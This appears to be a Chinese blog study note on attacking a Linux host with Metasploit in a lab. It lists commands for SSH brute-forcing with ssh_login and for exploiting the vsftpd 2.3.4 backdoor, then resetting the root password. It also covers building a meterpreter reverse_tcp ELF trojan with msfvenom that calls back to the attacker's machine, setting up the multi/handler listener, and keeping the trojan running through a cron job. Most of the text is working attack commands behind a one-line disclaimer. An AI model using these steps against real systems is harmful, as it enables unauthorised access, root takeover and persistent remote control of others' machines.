linux暴力破解&漏洞利用

==禁止非法操作,仅限参考=

暴力破解

  • 编辑密码本(vim password.txt)
  • 无声进入msf(msfconsole -q)
  • 搜索ssh_login相关程序(search ssh_login)
  • 设置攻击参数(use 0)
    设置用户名(set username msfadmin)
    设置密码本(set pass_file /root/password.txt)
    设置攻击目标(set rhosts 192.168.10.143)
  • 发起攻击(运行run)
  • 查看攻击会话(sessions)
  • 进入某个会话(sessions ID)
  • 退出(exit)
  • show options://显示程序运行时所需要的参数

漏洞利用

  • 扫描目标是否存在"笑脸漏洞(vsftpd2.3.4)"(nmap -sV ip)
  • 发起漏洞利用
    进入msf(msfconsole)
    搜索vsftpd(search vsftpd)
    使用程序(use 0)
    设置攻击目标(set rhosts ip)
  • 发起攻击(run)
  • whoami://查看是哪个用户
  • passwd root:// 设置密码

植入木马,达到长期控制的目的

  • msfvenom:攻击载荷生成器
    -p://选择一个载荷
    -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
    lhost://监听地址(攻击机kali的地址)
    lport://监听端口(攻击机kali的端口)
    -o:指定输出的文件名
    -h:查看帮助
  • msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序

为了防止上传报错,需要修改kali的ssh配置

  • 创建.ssh目录
    mkdir .ssh
  • 配置config
    vim .ssh/config
  • 添加三行配置
  • Host
  • HostkeyAlgorithms +ssh-rsa
  • PubkeyAcceptedKeyTypes +ssh-rsa

运行shell

  • 手动运行shell后门程序
    /mnt/shell & (&后台运行)
  • 在kali中侦听木马程序
  • 进入msf
    msfconsole
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
    ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致

如果想要让木马长期运行不被kill,需要做计划任务,定期运行

  • 编辑计划任务:
  • EDITOR:编辑器
    EDITOR=vim crontab -e
    *
    *
    *
    *
    * /mnt/shell&(每分钟运行一次)
  • 再次进入msf
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
  • 查看计划任务
    crontab -l
  • meterpreter>下将会话放到后台
    background
相关推荐
Johny_Zhao11 小时前
OpenClaw安装部署教程
linux·人工智能·ai·云计算·系统运维·openclaw
用户9623779544816 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机20 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机20 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544821 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star21 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
YuMiao1 天前
gstatic连接问题导致Google Gemini / Studio页面乱码或图标缺失问题
服务器·网络协议
chlk1232 天前
Linux文件权限完全图解:读懂 ls -l 和 chmod 755 背后的秘密
linux·操作系统
舒一笑2 天前
Ubuntu系统安装CodeX出现问题
linux·后端